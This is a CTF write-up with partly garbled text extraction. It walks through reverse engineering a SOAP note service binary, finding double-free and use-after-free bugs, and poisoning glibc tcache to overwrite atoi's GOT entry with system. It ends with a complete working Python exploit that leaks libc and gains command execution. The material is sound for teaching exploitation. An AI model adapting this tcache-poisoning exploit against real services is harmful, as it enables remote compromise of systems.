The authors of this tasks prepared three files for you:
- ELF binary
gsoapNote
; - ELF binary
libc-2.
; and27. so - XML file
ns.
.wsdl
www
SOAP is an XML-based protocol used for remote procedure calls. The ns.
(Web Services Description Language) describes access to the procedure you have to call. Your goal is to get remote code execution in the gsoapNote
SOAP service.
The authors hint that gsoapNote
can be run on a Linux PC with the libc-2.
library installed. Therefore, you must instruct the GDB debugger to load this binary each time the service starts. To do this, add the following code to .
:
user@ubuntu: cat .gdbinit...set exec-wrapper env 'LD_PRELOAD=./libc-2.27.so'
To extract information from ns.
, use the SOAPUI utility.
SOAPUI automatically generates an XML template for the RPC request. You can immediately see the network interface and port used by the server (localhost:
), as well as the RPC method (handleCommand(
). SOAPUI has no info about arguments yet; so, there is a question mark instead of them.
You run gsoapNote
, send the defective template via SOAPUI, and get a meaningful response from the server encoded in Base64:
<resultCode>2</resultCode>
Expectedly, gsoapNote
doesn’t like your request…
Time to examine ELF binary mitigation options.
The bad news is that stack canaries protect gsoapNote
from buffer overflow on the stack (2 – Canary found) and NX makes some memory pages nonexecutable (3 – NX enabled).
The list of good news is much longer: the RELRO
string indicates that you can rewrite the addresses of functions from shared libraries (1 – Partial
) and these addresses won’t be randomized (4 – No
) making it easier for you to seize the control. And the best news is that the binary contains symbols (5 – 817
); this means that you’ll have at least function signatures, which greatly facilitates the reverse.
Reverse engineering
handleCommand
As you remember, gsoapNote
contains symbols; so, you load it to IDA and jump to the handleCommand(
function.
info
Guys at OALabs use a very handy layout of windows in IDA: windows with disassembled and decompiled listings divide the workspace in half and are synchronized with each other.
It’s not that the decompiled listing is a nightmare – but it’s really difficult to understand what’s going on there. A for
loop, a number of nested if
conditions, the executeCommand(
function takes 9 arguments…
In that situation, I suggest to examine the listing as an Impressionist painting: just take a couple of steps back and look for common patterns.
First, you can see in several places that if the condition in the if
statement isn’t met, then the local variable v11
takes the value 2
, and a piece of code is skipped. And 2
is the result code received in response to the SOAPUI template. So far, everything adds up.
There is a plenty of code inside the for
loop. Let’s examine it in more detail.
The xmlDocGetRootElement(
function is called prior to the loop, and the returned structure is used in the for
loop. The +24 offset is dereferenced to initialize the counter and the +48 offset, for iteration.
Instead of examining the xmlDocGetRootElement(
function, let’s review source code examples that use it. For this purpose, I recommend grep.app. The site provides source code examples from quality repositories containing the feature you are interested in.
Using the link, jump to the selected project repository (I choose lastpass) and examine the source code:
// lastpass xml.c source code...#include <libxml/parser.h>#include <libxml/tree.h>...xmlNode *root;root = xmlDocGetRootElement(doc);...
Hmm… So, xmlDocGetRootElement(
returns a pointer to a structure of the xmlNode
type, while the structure itself is defined in libxml
. Time to Google libxml
and examine the xmlNode structure. The offsets that you’ve seen in the decompiled listing are of special interest.
Let’s convey this knowledge to IDA and create an xmlNode
structure using the same principle.
info
You don’t have to reconstruct the entire structure identically. Do this up to the required offset +48 (
.
Now go back to the decompiled listing and assign the type of a pointer to xmlNode
to the local variable v16
.
$Voila!$ It looks much better and you can see what’s going on in the for
loop. gsoapNote
parses XML: gets the root node, initializes the counter using its child xmlNode->
, and traverses the nodes adjacent to this child using xmlNode->
. Now strcmp(
makes sense: it compares the node name curXmlNode->
with the hardcoded string "array"
.
Note the parseArray(
function: it takes the current XML node and a zeroed twenty-byte array. Most probably, it’s zeroed because the parsing result will be written to it; after all, the parseArray(
function has such a name for a reason.
Also note how the parseArray(
return code affects the execution flow: if it’s zero, then a function with a curious name executeCommand(
is called; otherwise, the program goes to the next node.
You definitely need to get inside executeCommand(
, but to do that, you have to parse an array with null return code.
parseArray
The function takes two arguments: a1
and a2
. You have already found out that the first one is a pointer to xmlNode
, while the second one is a zeroed byte array. To see what’s going on with this array, look at cross-references to a2
in the decompiled listing.
First, note the offsets: +0, +8, +16, and +24. Each subsequent offset is greater than the previous one by the size of QWORD (8 bytes). In other words, this is not a 0x20-byte array, but an array of four QWORDs. By string 85, the entire structure is initialized.
At offsets +0 and +16, there are pointers to strings; at +8 and +24, there are integers.
Assume that parsing results are passed to this structure consisting of four QWORDs. Let’s call it PARSE_RESULT
.
Assign the xmlNode
type to the argument a1
and the PARSE_RESULT
type to a2
and examine parseArray(
again. Inside, you will see again a lot of monotonous XML parsing code. Since you have successfully defined types of the input arguments, you can read the decompiled listing almost like the source code.
Further analysis of parseArray(
provides a coherent picture of what should be inserted instead of the question mark. I won’t bore you with further parsing; the resultant XML is shown below.
info
The value of the <
node must be equal to the number of nodes inside the <
minus one.
Thanks to the correct definition of the structures, static analysis of gsoapNote
gives plenty of useful information. Time to continue the study in dynamics. Let’s send the XML shown in the figure above, set a breakpoint at the output of parseArray(
(at address 0x403BE2), and check the contents of PARSE_RESULT
after parsing the XML from the above request:
# Let's see the contents of PARSE_RESULT after returning from parseArray()pwndbg> x/4gx $PARSE_RESULT`0x7ffffffd5a90: 0x00000000006562a0 0x00000000000010000x7ffffffd5aa0: 0x00000000006575b0 0x0000000000010000pwndbg> x/s ((long*)$PARSE_RESULT)[0]0x6562a0: "AAAAAA"pwndbg> x/d ((long*)$PARSE_RESULT + 1)0x7ffffffd5a98: 4096pwndbg> x/s ((long*)$PARSE_RESULT)[2]0x6575b0: "BBBBBB"pwndbg> x/d ((long*)$PARSE_RESULT + 3)0x7ffffffd5aa8: 65536# The contents are fully consistent with SOAPUI crafted XML# But the result code (-1) is not what you need...pwndbg> i r raxrax 0xffffffff
It’s always a pleasure to watch how the data you control are copied into process memory. All fields of the PARSE_RESULT
structure are initialized, which means that almost all the code of the parseArray(
function has been executed. Too bad, the return code is -1, which prevents you from moving on…
Let’s find out what’s the problem. Of course, you can start executing the code in the debugger step-by-step, but that’s too long. To do this quickly, in one click, highlight the executed code using DynamoRIO.
DynamoRIO is a framework used to develop dynamic analysis tools. The drcov tool embedded in it will show all executed instructions.
info
If, for some reason, you decide to solve this problem in the debugger, I recommend using a custom GDB command called step before. You enter sb
in the console and set a break before the call
instruction. This will expedite the debugging process.
Run gsoapNote
under the drcov
instrumentation as follows:
<path to DynamoRIO>/bin64/drrun -t drcov - gsoapNote
Send XML via SOAPUI again and kill the drrun process.
drrun
has generated a drcov.
file containing addresses of the executed instructions. To view this file, use the lighthouse plugin for IDA.
info
At the time of writing, the latest version of DynamoRIO was 9.0 with drcov
v. 3. Too bad, lighthouse can’t parse version 3 files; so, I use version 8.0 with drcov
v. 2.
Executed instructions are highlighted in green. The above screenshot shows the moment when you exit with a return code of -1. This happens because the value inside <
is not equal to the length of the <
string. So, you correct the XML in SOAPUI, execute parseArray(
, and get into executeCommand(
. Success!
executeCommand
This is the function with nine arguments that looked so scary at the very beginning. But is the number of its arguments really so large?
executeCommand((int)s, (int)"show", v3, v4, v5, v6, v18.pzStr1, v18.num1, (__int64)v18.pzStr2);
Let’s collect more information from the disassembler listing. So far, Linux binary gsoapNote
had used the System V calling convention: the first six arguments are passed via the rdi
, rsi
, rdx
, rcx
, r8
, and r9
registers; the rest, via the stack in reverse order.
# Passing arguments in executeCommand()mov rax, [rbp+s]push [rbp+var_68] ; stack argpush [rbp+var_70] ; stack argpush [rbp+var_78] ; stack argpush [rbp+var_80] ; stack argmov rdi, rax ; register argcall executeCommand
You can see initialized rdi
and four arguments on the stack. Now let’s see what happens with registers-arguments inside executeCommand()
mov [rbp+var_8], rdi ; rdi savedmov esi, offset s2 ; rsi overwrittenmov rdx, [rbp+arg_10] ; rdx overwrittenmov rcx, rax ; rcx overwritten
Some of them aren’t used and are immediately overwritten! The compiler has optimized the function call. As you can see, if functions are called inside a binary, the compiler doesn’t necessarily have to comply with System V. IDA wasn’t aware of this and showed nine arguments in the decompiled listing.
www
Compiler optimizations are addressed in detail in the lecture “Unbolting the Compiler’s Lid” by Matt Godbolt. I especially like the example where the compiler optimizes a function that adds together elements of an array [
. The developer uses a for
loop, but the compiler – who is smarter than the developer! – uses the formula that calculates the sum of an arithmetic progression: N(
. You can also learn from Matt about the Compiler Explorer tool.
Let’s watch in dynamics what four arguments are put on the stack. Set a breakpoint on the call
instruction at 0x403CE4.
info
The above screenshot shows the pwbdbg
plugin. Note that pwndbg
dereferences the stack, which is incredibly handy. It also includes many other useful plugins; one of them will be used later.
Do you recognize these data? The PARSE_RESULT
structure is on the stack, and a pointer to the zeroed array 0xF0 in length is in rdi
. In other words, the optimization is as follows: four QWORDs of the PARSE_RESULT
structure are put on the stack, and only rdi
is used from registers. Let’s convey this knowledge to IDA by defining the calling convention manually. You have to define the function type in the decompiled listing.
How it was before:
__int64 __fastcall executeCommand(__int64 a1, int a2, int a3, int a4, int a5, int a6, char *command, __int64 a8, __int64 a9)
How it is now:
__int64 __usercall executeCommand@<rax>(PARSE_RESULT pr, void *pArray_F0@<rdi>)
Now you can treat the decompiled executeCommand(
listing as source code.
It immediately becomes clear what fields of the PARSE_RESULT
structure are used by specific functions and that PARSE_RESULT.
is the name of the command (where you had "AAAAAAA"
).
Now all you have to find out is: what is the array whose length is 0xF0? It’s of interest because it’s passed to each of the functions newNote(
, editNote(
, and deleteNote(
together with PARSE_RESULT
. Since its length is 0xF0, let’s call it foo
, even though you are now working in C, not in Python.
I take the easiest way by choosing deleteNote
deleteNote
Let’s examine the short and nicely looking decompiled deleteNote
code.
In string 3, you see that foo
is an array of pointers, while num2
is the index of this array; the index can take on values from 0 to 9 inclusive.
In string 5, the pointer is dereferenced, and the program checks whether the QWORD at offset +16 is equal to zero (let’s call this memory area bar
). If not, then free(
is called followed by an unconditional free(
call to the pointer at index num2
. The scheme is shown below (data that you control from XML are highlighted in red; what is passed to free(
, in gray).
When you see free(
in C code, you have to pay attention to what happens with the freed pointer next. In this particular case, nothing happens (although in a perfect world, it must be zeroed). Nothing prevents you from calling deleteNote(
twice with the same index. This gives you the first primitive: double free.
editNote
The amount of code in editNote(
is larger, but you already know something about the ‘foo bar’.
The program checks whether the index is in the range from 0 to 9. You have already seen this in deleteNote(
. You get the first QWORD from bar
and compare it with the length of your XML string after decoding it from Base64.
If this QWORD is longer than the string length, you copy the string to bar
. A logical check for buffer overflow. The scheme used to store your notes finally becomes more or less clear. Let’s return the ‘foo bars’ to Python adepts and give meaningful names associated with notes. For instance, foo
is an array of pointers to the NOTE_ENTRY
note structure in bar
.
newNote
Now you have to find out what is located at NOTE_ENTRY
offsets +8, +24, +32, etc.
Offsets +24 and further are of no interest because only 24 bytes are allocated for the structure; in other words, the last significant QWORD is located at offset +16.
The number that was interpreted as an index in previous functions is written at offset +8; then this number is passed to malloc(
, and the returned pointer is written to pText
. In the newNote(
context, it’s no longer an index, but the note size
.
Next, a string from XML (decoded from Base64) is copied to pText
, and the length of this string determines the number of bytes copied to memcpy(
. The size of the allocated buffer and the size of the copied data may not match. A classical vanilla buffer overflow. In this particular case, on the heap.
Note that you control the size
argument for malloc(
. This allows you to choose the glibc
memory allocation strategy.
info
The malloc(
implementation in glibc
supports linked lists (i.e. bins) for memory chunks of different sizes. The behavior of free(
in relation to these bins is also different. The exploit you’re about to write will use this feature.
show
executeCommand(
contains one more command: show
. gsoapNote
allows you to create, delete, and edit notes; therefore, such a command is absolutely mandatory.
Now you know all the NOTE_ENTRY
fields and can easily understand what’s going on there: based on its index, the note is encoded in Base64 and returned to the user. Since the pointer isn’t zeroed after the deletion with deleteNote(
, an opportunity to use after free arises: you can read the memory after free(
.
Reverse results
To make sure that you understand the commands correctly, let’s perform a simple task: create the AAAAAA
note, edit it to get the BBB
note, show it, and then delete.
Great! Everything works as expected.
Analyzing primitives
Time to examine the existing primitives and find out how to exploit the vulnerability.
UAF (use-after-free)
This sequence of commands gives you a memory leak primitive that can be used to bypass ASLR. It’s described in more detail in an earlier article. In brief, it works as follows:
- using the
new
command, you create a large chunk; - using the
delete
command, you free it where the note text used to be;free(
writes a pointer to) glibc
; and - using
show
, you read this pointer.
A POC in SOAPUI looks as follows.
Elixir Cross Referencer
If you are interested in the glibc
code, I strongly recommend the elixir.bootlin.com resource. It’s like an IDE in your browser. Also, you can find there any version of the library. For instance, this is the place where a pointer to glibc
is written during the execution of free(
.
Heap overflow
In this particular case, it’s not that easy to sploit heap overflow. There is one point that I deliberately missed in the Reverse Engineering section: each XML request creates a new pNOTE_ENTRY[
array in the heap. In other words, if you create a note in the first XML, it won’t be available from the second request.
For instance, to exploit the House of Force technique, you need the address of the top_chunk
global structure. Knowing it, you calculate size
for malloc(
, which triggers int ovferflow in malloc(
, and the function returns the pointer you control. Prior to this, you have to overwrite the top_chunk.size field using heap overflow to ensure that the code execution continues to the point where int overflow occurs.
Assume that somehow you managed to link the heap address with the first XML request, calculated the required size
value, and then sent the second XML request. malloc(
will be called several times during the SOAP request processing, then another malloc(
will be called for the pNOTE_ENTRY[
array. As a result, by the time of exploitation, the computed value will become invalid, and it’s difficult to predict it. More information on this can be found here. So, let’s put this primitive aside and look for something else.
Unobvious UAF and tcachebins
Tcache was added to glibc
to speed up malloc(
.You have to understand that:
- for each thread,
glibc
allocates several singly-linked lists (i.e. tcachebins) for chunks of different sizes; -
free(
adds the freed pointer to the beginning of the list; and) -
malloc(
takes a pointer from the beginning of the list.)
Imagine the following starting conditions: the tcache list is empty, and you’ve created a note whose size
is equal to 0x17. The glibc
data are highlighted in yellow; the data you control, in red.
Now let’s call the delete
command. Two pointers will be freed and added to the tcache linked list.
Remember the check in editNote(
: the length of the new note must be less than the textLen
of the original one? Now a pointer to a memory area is in place of textLen
, and the value of this pointer is definitely greater than the length of the new note.
In other words, you can still edit the last element in the linked list using the edit
command.
After the editing, glibc
will think that the tcache linked list consists of three elements. Accordingly, the third malloc(
will return the pointer you control. A prerequisite for this is that the size
of all three malloc(
functions must be suitable for the tcache small bin.
You have to ensure that the third malloc(
is called in the new
command, and the next call will be memcpy(
of your data. This is how you get a powerful RW primitive.
Note that the size
value is a very important factor. See what happens if size
becomes, for instance, 0x20. In this case, the textLen
pointer will be zeroed.
The UAF capability of the edit
command is lost: zero will always be less than the length of the new note. Even if free(
is called later in the code, the new element will be added at the beginning of the list. The field you need will always be zero.
A POC in SOAPUI looks as follows.
info
Here you see the output of the tcachebins
plugin embedded in pwndbg
: it clearly shows what is stored in the linked list. Also, if you don’t want to study tcachein
glibc` source code, you can examine the plugin code in Python.
To simplify debugging, I’ve logged malloc(
calls in newNote(
. See what addresses are returned by corrupted glibc
:
New note - malloc size 0x18, addr 0x650390
New note - malloc size 0x400, addr 0x64acc0
New note - malloc size 0x18, addr 0x650030
New note - malloc size 0x8, addr 0x7ffff746d000 <--- The address you've set in the edit function
So, you’ve got a gun that shoots 8 bytes at the controlled address! But where to shoot?
Building exploit
When I was thinking how to use these primitives, my ideas were mostly primitive. Well, you can write eight bytes to an arbitrary address… You have to seize control… You can rewrite the pointer to some function, remove the heap NX using ROP gadgets, write shellcode there…
Then I stumbled upon a Chinese write-up of the same CTF. I couldn’t resist and read it. The exploit was so elegant that I decided to use it.
The problem is that when I was thinking about the exploit, I completely ignored an important fact: the binary execution continues up to the fourth malloc(
. And in the meantime, the XML processing continues, and new calls to glibc
functions are made!
The second important fact is the absence of RELRO in the binary. This means that you can shoot at the .
section. atoi(
is the ideal target since this function takes a string as an input argument and system(
takes the same argument.
The payload is delivered by the next XML node (<
): after overwriting .
, it will call system(
with the string under your control.
So, the final exploit, combines two PoCs. This means that you have to send two XML messages. The first one has to leak the address of glibc
. Knowing the address of glibc
, you can calculate the VA of the system(
function. The address of the pointer to atoi(
in the .
section of the binary is already known (at the very beginning of the article, I showed that gsoapNote
was built without ASLR). In the second message, you use the RW primitive to overwrite atoi(
with system(
and run the payload.
Running exploit
Let’s see whether it works!
user@ubuntu$
[
[
[
[
[
[
RCE confirmation on the server:
user@ubuntu:
..
\
\
Conclusions
Congrats! You have completed a challenging task, learned the heap management implementation in glibc
, and gained practical experience with a number of useful tools.
If you want more practice, try to write an exploit using the heap overflow primitive.
The full code of the UAF exploit is provided below.
import base64import socketimport reimport structdef soap_message(array): return f"""<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:urn="urn:note"> <soapenv:Header/> <soapenv:Body> <urn:handleCommand soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <commandXml xsi:type="xsd:string"> <commandSeq> {"".join(array)} </commandSeq> </commandXml> </urn:handleCommand> </soapenv:Body></soapenv:Envelope> """def new_note(content, size=None): contentBase64 = base64.b64encode(content) if not size: size = len(content) return f""" <array> <number>3</number> <simpleString> <content>new</content> </simpleString> <integer> <content>{size}</content> </integer> <bulkString> <content>{contentBase64.decode()}</content> <number>{len(contentBase64)}</number> </bulkString> </array> """def edit_note(content, note_index): contentBase64 = base64.b64encode(content) return f""" <array> <number>3</number> <simpleString> <content>edit</content> </simpleString> <integer> <content>{note_index:d}</content> </integer> <bulkString> <content>{contentBase64.decode()}</content> <number>{len(contentBase64)}</number> </bulkString> </array> """def show_note(note_index): return f""" <array> <number>2</number> <simpleString> <content>show</content> </simpleString> <integer> <content>{note_index:d}</content> </integer> </array> """def delete_note(note_index): return f""" <array> <number>2</number> <simpleString> <content>delete</content> </simpleString> <integer> <content>{note_index:d}</content> </integer> </array> """def payload(system_command): return f""" <array> <number>{system_command}</number> </array> """def send_to_gsoapnote(command_array): msg = soap_message(command_array) sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM) sock.connect(('localhost', 33263)) sock.send(bytes(msg, 'ascii')) response = sock.recv(1024).decode() sock.close() try: result = re.findall(r"(?<=<result>).*(?=</result>)", response, flags=re.IGNORECASE)[0] result = base64.b64decode(result) print(result) except: pass try: result = re.findall(r"(?<=<msg>).*(?=</msg>)", result.decode(), flags=re.IGNORECASE)[0] result = base64.b64decode(result) except: pass return resultdef libc_leak(): free_and_show = ( new_note(b'E'*8, 1281), delete_note(0), show_note(0) ) response = send_to_gsoapnote(free_and_show) fd_pointer = struct.unpack("<Q", response)[0] return fd_pointer - 0x3ec2c0def exploit_tcache_linked_list(addr, value, system_command): tcache_exploit_commands = ( new_note(b'A'*8, 0x17), delete_note(0), edit_note(struct.pack('Q', addr), 0), new_note(b'C'*8, 0x30), new_note(struct.pack('Q', value), 8), payload(system_command) ) response = send_to_gsoapnote(tcache_exploit_commands)if __name__ == '__main__': print('[+] Stage I. Craft xml to leak libc address') libc_addr = libc_leak() print(f'[+] libc address is {hex(libc_addr)}') print('[+] Stage II. Calculate required addresess and trigger RCE') system_func_addr = libc_addr + 0x4f4e0 atoi_plt_addr = 0x6372b8 print(f'[+] system address is {hex(system_func_addr)}') print(f'[+] atoi .got.plt address is {hex(atoi_plt_addr)}') print('[+] trigger RCE') exploit_tcache_linked_list(atoi_plt_addr, system_func_addr, "sleep 999")